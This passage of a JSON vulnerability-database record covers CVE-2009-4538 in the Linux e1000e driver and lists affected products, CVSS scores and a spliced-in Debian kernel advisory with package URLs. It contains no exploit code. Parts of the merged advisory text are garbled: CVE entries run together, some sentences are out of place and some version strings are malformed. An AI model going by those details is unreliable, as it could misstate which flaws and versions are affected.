        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "desktop video device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      },
      {
        "model": "intuity audix lx sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "linux enterprise server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel .0-test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "vma rhel5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel pre-1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34.6"
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel -ow1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.3"
      },
      {
        "model": "kernel -pre6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.16"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "intuity audix lx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel pre7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel pre-7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "messaging storage server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux enterprise high availability extension",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "37523"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-078"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4538"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.32.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-4538"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Eugene Teo  eugeneteo@eugeneteo.net",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-078"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2009-4538",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": true,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2009-4538",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-41984",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2009-4538",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201001-078",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-41984",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2009-4538",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41984"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4538"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-078"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4538"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "drivers/net/e1000e/netdev.c in the e1000e driver in the Linux kernel 2.6.32.3 and earlier does not properly check the size of an Ethernet frame that exceeds the MTU, which allows remote attackers to have an unspecified impact via crafted packets, a related issue to CVE-2009-4537. The Linux e1000e driver is prone to a security-bypass vulnerability. \nAn attacker can exploit this issue to cause network traffic to be misinterpreted, which may allow the attacker to bypass intended security restrictions or launch further attacks. The Linux kernel is the kernel used by the open source operating system Linux released by the American Linux Foundation. The NFSv4 implementation is one of the distributed file system protocols.  Although\nsecurity support for \u0027etch\u0027 officially ended on Feburary 15th, 2010,\nthis update was already in preparation before that date. \n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, sensitive memory leak or privilege\nescalation.  The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2009-2691\n\n    Steve Beattie and Kees Cook reported an information leak in the\n    maps and smaps files available under /proc. Local users may be\n    able to read this data for setuid processes while the ELF binary\n    is being loaded. \n\nCVE-2009-2695\n\n    Eric Paris provided several fixes to increase the protection\n    provided by the mmap_min_addr tunable against NULL pointer\n    dereference vulnerabilities. \n\nCVE-2009-3080\n\n    Dave Jones reported an issue in the gdth SCSI driver. A missing\n    check for negative offsets in an ioctl call could be exploited by\n    local users to create a denial of service or potentially gain\n    elevated privileges. \n\nCVE-2009-3726\n\n    Trond Myklebust reported an issue where a malicious NFS server\n    could cause a denial of service condition on its clients by\n    returning incorrect attributes during an open call. \n\nCVE-2009-3889\n\n    Joe Malicki discovered an issue in the megaraid_sas driver. \n    Insufficient permissions on the sysfs dbg_lvl interface allow\n    local users to modify the debug logging behavior. \n\nCVE-2009-4005\n\n    Roel Kluin discovered an issue in the hfc_usb driver, an ISDN\n    driver for Colognechip HFC-S USB chip. \n\nCVE-2009-4020\n\n    Amerigo Wang discovered an issue in the HFS filesystem that would\n    allow a denial of service by a local user who has sufficient\n    privileges to mount a specially crafted filesystem. Avati discovered an issue in the fuse subsystem. If the\n    system is sufficiently low on memory, a local user can cause the\n    kernel to dereference an invalid pointer resulting in a denial of\n    service (oops) and potentially an escalation of privileges. \n\nCVE-2009-4138\n\n    Jay Fenlason discovered an issue in the firewire stack that allows\n    local users to cause a denial of service (oops or crash) by making\n    a specially crafted ioctl call. \n\nCVE-2009-4308\n\n    Ted Ts\u0027o discovered an issue in the ext4 filesystem that allows\n    local users to cause a denial of service (NULL pointer\n    dereference). \n\nCVE-2009-4536 \u0026 CVE-2009-4538\n\n    Fabian Yamaguchi reported issues in the e1000 and e1000e drivers\n    for Intel gigabit network adapters which allow remote users to\n    bypass packet filters using specially crafted Ethernet frames. This option is disabled by\n    default. \n\nCVE-2010-0007\n\n    Florian Westphal reported a lack of capability checking in the\n    ebtables netfilter subsystem. If the ebtables module is loaded,\n    local users can add and modify ebtables rules. \n\nCVE-2010-0410\n\n     Sebastian Krahmer discovered an issue in the netlink connector\n     subsystem that permits local users to allocate large amounts of\n     system memory resulting in a denial of service (out of memory). \n\nCVE-2010-0415\n\n    Ramon de Carvalho Valle discovered an issue in the sys_move_pages\n    interface, limited to amd64, ia64 and powerpc64 flavors in Debian. \n    Local users can exploit this issue to cause a denial of service\n    (system crash) or gain access to sensitive kernel memory. \n\nCVE-2010-0622\n\n    Jermome Marchand reported an issue in the futex subsystem that\n    allows a local user to force an invalid futex state which results\n    in a denial of service (oops). \n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 2.6.24-6~etchnhalf.9etch3. \n\nWe recommend that you upgrade your linux-2.6.24 packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386,\nia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc\n    Size/MD5 checksum:     5118 e05bb21e7655cbfa39aed8d4fd6842eb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz\n    Size/MD5 checksum:  4099250 127bad8d653046d37fc52115d4e3a332\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz\n    Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  4263554 6c56ff077d17eba766af47544ce0f414\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:    83890 62cfd18ed176359831502e70d80b291a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum: 46871628 328ad30d3c07f90c56d821f76e186b40\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  1550090 1f114fdc3123f135017dbdcd0e4839c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  1009878 c7b7abff092940a400703b9168e46daa\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:    98248 a2a391008f8855d8358d5f18d9d76044\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329786 a212d2b3a94f8a04611c0f20d3d324b9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 27236282 b5bc553c4bf3a49843c45814fab72443\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:    83428 f5f27b9de4905239e6315c77393f1f03\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:    83454 5d152b5b6aa505982ebc7122a770b29b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 26641900 c799e7d48937975036b46edf032ecd87\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 26620162 eb1c3c27f1ac81959dc0f2ab497aee35\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:  3455268 da2d2cc2b7c4253ac408c30fcfddb28f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329788 f589f8815f7adf02f8884e2dd3ac613f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329336 14bf085655b30adc8ab8f6ed4207d415\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum: 19482308 c49d2962c1a391fb00fb1b5f0598b24e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:  3656476 f2f5de65037664d03208fcea83bf2ee2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:    83422 600c7216143f43f9c61b0c2ccd118ea0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:    83434 36f1d8f21ec39a473536dbeda2332e62\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:   346940 d3f12fdd61f90749fdd08d857b326327\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:  9357734 3e1165a0795d7db5f7ed8ef84205064b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   298744 50d8bfa3c06134e190409399a36c5aa9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:    83546 1742ab93afadd1827009bf1d714e76eb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:    83578 07906e33f9ad267d986991c93eef1048\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum: 10778670 cc38a718ad5fd1c6e92d23e416610bd6\n  